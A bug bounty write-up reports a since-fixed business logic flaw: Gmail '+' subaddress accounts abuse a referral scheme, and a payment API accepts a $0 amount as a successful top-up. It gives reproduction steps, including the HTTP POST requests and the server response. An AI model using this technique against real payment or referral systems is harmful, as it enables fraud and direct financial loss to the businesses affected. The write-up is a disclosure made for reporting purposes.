WRITEUP, BUG HUNTING, BUSINESS LOGIC ERROR

Referral System Abuse Leading to Unlimited Funds [EN]

Introduction

In July 2025, I discovered a business logic flaw in the referral and payment system that allowed attackers to generate unlimited free funds without making real purchases.

The flaw combined Gmail subaddressing tricks with a broken $0 payment validation, resulting in unauthorized funds being applied to referrer accounts.
This issue could be escalated further during promotional campaigns, which offered $5 in Bitcoin per item purchase.

Proof of Concept

The attack relied on two weaknesses:

Account Duplication via Gmail Subaddressing
For example: attacker+1@gmail.com, attacker+2@gmail.com, etc.
These were treated as unique accounts, even though all emails were delivered to the same inbox.

Invalid $0 Payments Accepted as Valid Transactions
The system incorrectly processed $0 transactions as successful.

Steps to Reproduce

1. Copy the referral code from the main account:

https://example.com/abcd1234

2. Register fake “friend” accounts using the referral code:

attacker+1@gmail.com
attacker+2@gmail.com
attacker+3@gmail.com

3. Trigger the $0 payment bug by changing the value to 0 to top up the main account:

POST /api/control_panel/account_balance/custom_pay HTTP/2
Host: www.example.com
Content-Type: application/json
Cookie: 

{
  "amount": 500
}

POST /api/control_panel/account_balance/custom_pay HTTP/2
Host: www.example.com
Content-Type: application/json
Cookie: 

{
  "amount": 0
}

Response:

HTTP/2 200 OK

{
  "success": true
}

A receipt email was generated. The referrer account received $2 fund.

4. Repeat the process:
This could be automated at scale to generate unlimited funds (although $2 per account, we can loop this issue).

5. Escalation:
During promotions, the attacker could chain this flaw with the $5 Bitcoin reward per item purchase, effectively farming BTC rewards.

Severity

Initially classified as High, but later downgraded to Medium due to represent impact on the system, not sure why, but i don’t mind.

CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

Security Impact

  • Unlimited free credits/funds.
  • Direct financial loss when combined with promotional rewards.

Timeline

  • July 16, 2025 – Report submitted
  • July 27, 2025 – Pending program review
  • August 8, 2025 – Bug confirmed in scope
  • August 20, 2025 – Severity downgraded from High to Medium
  • August 20, 2025 – Issue resolved
updated_at 31-08-2025